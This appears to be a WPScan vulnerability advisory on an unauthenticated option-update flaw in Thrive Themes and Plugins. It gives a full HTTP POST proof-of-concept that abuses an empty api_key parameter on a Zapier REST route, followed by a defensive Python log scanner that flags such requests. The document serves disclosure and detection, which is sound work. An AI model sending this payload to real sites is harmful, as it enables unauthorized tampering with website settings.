wpvulndb
Chloe Chamberland, Ram Gall, Charles Sweethill
WPVDB-ID: 35ACD2D8-85FC-4AF5-8F6C-224FA7D92900
History: Mar 24, 2021 - 12:00 a.m.

All Thrive Themes and Plugins - Unauthenticated Option Update

wpscan.com

EPSS: 0.001 Low (Percentile: 38.8%)

The plugins and themes register a REST API endpoint associated with Zapier functionality. The endpoint was intended to require an API key, but in vulnerable versions it could be accessed by supplying an empty api_key parameter if Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.

PoC

POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

hook_url={"http://key":"maliciousfile.php"}&api_key=
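
Seen from the defender's side, requests like the one above can be found in web-server logs. The following is an added example, not part of the original advisory or of the Thrive code: it scans access-log lines (Combined Log Format assumed) for POST requests that reached the route, and, where request bodies are captured, checks for the empty api_key the advisory describes. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ROUTE = "/td/v1/optin/subscription"  # REST route taken from the PoC request

# Combined Log Format: ip - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def rest_route(target):
    """Return the WordPress REST route a request target addresses, or None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if "/wp-json/" in path:                      # pretty-permalink form
        route = "/" + path.split("/wp-json/", 1)[1]
    else:                                        # ?rest_route=/... form
        route = parse_qs(parts.query).get("rest_route", [None])[0]
    return route.rstrip("/").lower() if route else None

def find_hits(lines):
    """Return ip/time/status for each POST that reached the opt-in route."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and rest_route(m["target"]) == ROUTE:
            hits.append({k: m[k] for k in ("ip", "time", "status")})
    return hits

def empty_api_key(body):
    """True when a form-encoded body carries api_key with an empty value."""
    fields = parse_qs(body, keep_blank_values=True)
    return "api_key" in fields and fields["api_key"][0] == ""

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Mar/2021:10:01:02 +0000] "POST /wp-json/td/v1/optin/subscription HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [24/Mar/2021:10:01:09 +0000] "POST /index.php?rest_route=%2Ftd%2Fv1%2Foptin%2Fsubscription HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [24/Mar/2021:10:02:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [24/Mar/2021:10:03:00 +0000] "POST /wp-json/wp/v2/comments HTTP/1.1" 401 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

On a site where Zapier is not enabled, any hit on this route is worth reviewing alongside the contents of the affected wp_options entry.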
